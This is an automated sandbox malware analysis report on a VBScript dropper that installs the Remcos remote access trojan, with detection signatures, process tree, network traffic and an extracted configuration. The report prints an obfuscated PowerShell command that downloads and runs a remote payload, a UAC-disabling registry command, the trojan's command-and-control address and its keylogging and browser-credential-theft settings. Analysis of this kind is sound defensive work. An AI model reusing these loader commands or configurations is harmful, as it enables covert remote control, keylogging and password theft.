Play interactive tour

Edit tour

Analysis Report Appraisa.vbs

Overview

General Information

Sample Name:	Appraisa.vbs
Analysis ID:	394453
MD5:	2e95d045ff86903502b52f5fd0976aad
SHA1:	c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
SHA256:	dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
Tags:	RATRemcosRATvbs
Infos:
Most interesting Screenshot:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Remcos

VBScript performs obfuscated calls to suspicious functions

Yara detected Powershell download and execute

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Creates an undocumented autostart registry key

Delayed program exit found

Injects a PE file into a foreign processes

Installs a global keyboard hook

Obfuscated command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected MSILLoadEncryptedAssembly

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

wscript.exe (PID: 6572 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 6632 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6868 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)

aspnet_compiler.exe (PID: 6984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "194.5.97.183:8888:1", "Assigned name": "Host", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VMXRX", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\ Microsoft.ps1	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x5f69c:$str_a1: C:\Windows\System32\cmd.exe 0x5f618:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f618:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e86c:$str_b2: Executing file: 0x5f7e0:$str_b3: GetDirectListeningPort 0x5f050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f3d4:$str_b5: licence_code.txt 0x5f278:$str_b7: \update.vbs 0x5e8dc:$str_b9: Downloaded file: 0x5e8a8:$str_b10: Downloading file: 0x5e890:$str_b12: Failed to upload file: 0x5f7a8:$str_b13: StartForward 0x5f7c8:$str_b14: StopForward 0x5f220:$str_b15: fso.DeleteFile " 0x5f1b4:$str_b16: On Error Resume Next 0x5f250:$str_b17: fso.DeleteFolder " 0x5e880:$str_b18: Uploaded file: 0x5e91c:$str_b19: Unable to delete: 0x5f1e8:$str_b20: while fso.FileExists("
00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6984	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 6632	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: powershell.exe PID: 6632	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
16.2.aspnet_compiler.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f69c:$str_a1: C:\Windows\System32\cmd.exe 0x5f618:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f618:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e86c:$str_b2: Executing file: 0x5f7e0:$str_b3: GetDirectListeningPort 0x5f050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f3d4:$str_b5: licence_code.txt 0x5f278:$str_b7: \update.vbs 0x5e8dc:$str_b9: Downloaded file: 0x5e8a8:$str_b10: Downloading file: 0x5e890:$str_b12: Failed to upload file: 0x5f7a8:$str_b13: StartForward 0x5f7c8:$str_b14: StopForward 0x5f220:$str_b15: fso.DeleteFile " 0x5f1b4:$str_b16: On Error Resume Next 0x5f250:$str_b17: fso.DeleteFolder " 0x5e880:$str_b18: Uploaded file: 0x5e91c:$str_b19: Unable to delete: 0x5f1e8:$str_b20: while fso.FileExists("
16.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
16.2.aspnet_compiler.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ea9c:$str_a1: C:\Windows\System32\cmd.exe 0x5ea18:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea18:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e038:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e690:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5dc6c:$str_b2: Executing file: 0x5ebe0:$str_b3: GetDirectListeningPort 0x5e450:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e7d4:$str_b5: licence_code.txt 0x5e678:$str_b7: \update.vbs 0x5dcdc:$str_b9: Downloaded file: 0x5dca8:$str_b10: Downloading file: 0x5dc90:$str_b12: Failed to upload file: 0x5eba8:$str_b13: StartForward 0x5ebc8:$str_b14: StopForward 0x5e620:$str_b15: fso.DeleteFile " 0x5e5b4:$str_b16: On Error Resume Next 0x5e650:$str_b17: fso.DeleteFolder " 0x5dc80:$str_b18: Uploaded file: 0x5dd1c:$str_b19: Unable to delete: 0x5e5e8:$str_b20: while fso.FileExists("

Sigma Overview

System Summary:

Sigma detected: Remcos

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6984, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 16.2.aspnet_compiler.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": "194.5.97.183:8888:1", "Assigned name": "Host", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VMXRX", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0042DD9C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

Source: aspnet_compiler.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.6:49716 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.241.228.140:443 -> 192.168.2.6:49722 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.241.227.121:443 -> 192.168.2.6:49727 version: TLS 1.0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00406176 FindFirstFileW,FindNextFileW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040A216 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004452E9 FindFirstFileExA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040A431 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00407C57 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00414C1B FindFirstFileW,FindNextFileW,FindNextFileW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416F26 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: 194.5.97.183

Source: global traffic

TCP traffic: 192.168.2.6:49734 -> 194.5.97.183:8888

Source: Joe Sandbox View

IP Address: 207.241.228.140 207.241.228.140

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	HTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.6:49716 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.241.228.140:443 -> 192.168.2.6:49722 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.241.227.121:443 -> 192.168.2.6:49727 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.97.183

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0041230D Sleep,URLDownloadToFileW,

Source: unknown

DNS traffic detected: queries for: ia601509.us.archive.org

Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000001.00000002.607374072.000001E84E9B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: powershell.exe, 0000000C.00000003.409245391.00000135614DD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://ia601401.us.archive.org
Source: powershell.exe, 00000001.00000002.604580136.000001E838036000.00000004.00000001.sdmp	String found in binary or memory: http://ia801400.us.archive.org
Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/02
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.596741320.000001E836671000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.604945687.000001E83814F000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: https://ia601401.us.archive.org
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp	String found in binary or memory: https://ia601401.us.archive.org/6/items/server_20210420_1438/Server.txt
Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	String found in binary or memory: https://ia601401.us.archive.orgx
Source: powershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmp	String found in binary or memory: https://ia601509.us.archive.org
Source: PowerShell_transcript.367706.fOfA42_i.20210421153634.txt.1.dr	String found in binary or memory: https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT
Source: powershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmp	String found in binary or memory: https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT0y
Source: powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmp	String found in binary or memory: https://ia801400.us.arX
Source: powershell.exe, 00000001.00000002.603008008.000001E837A68000.00000004.00000001.sdmp	String found in binary or memory: https://ia801400.us.archive.org
Source: powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmp	String found in binary or memory: https://ia801400.us.archive.org/0/items/bat02/bat02.txt
Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00412575 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00412575 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00412468 ExitWindowsEx,LoadLibraryA,GetProcAddress,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00422089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004340BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0044C1EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0041A272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0045F218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0043034B
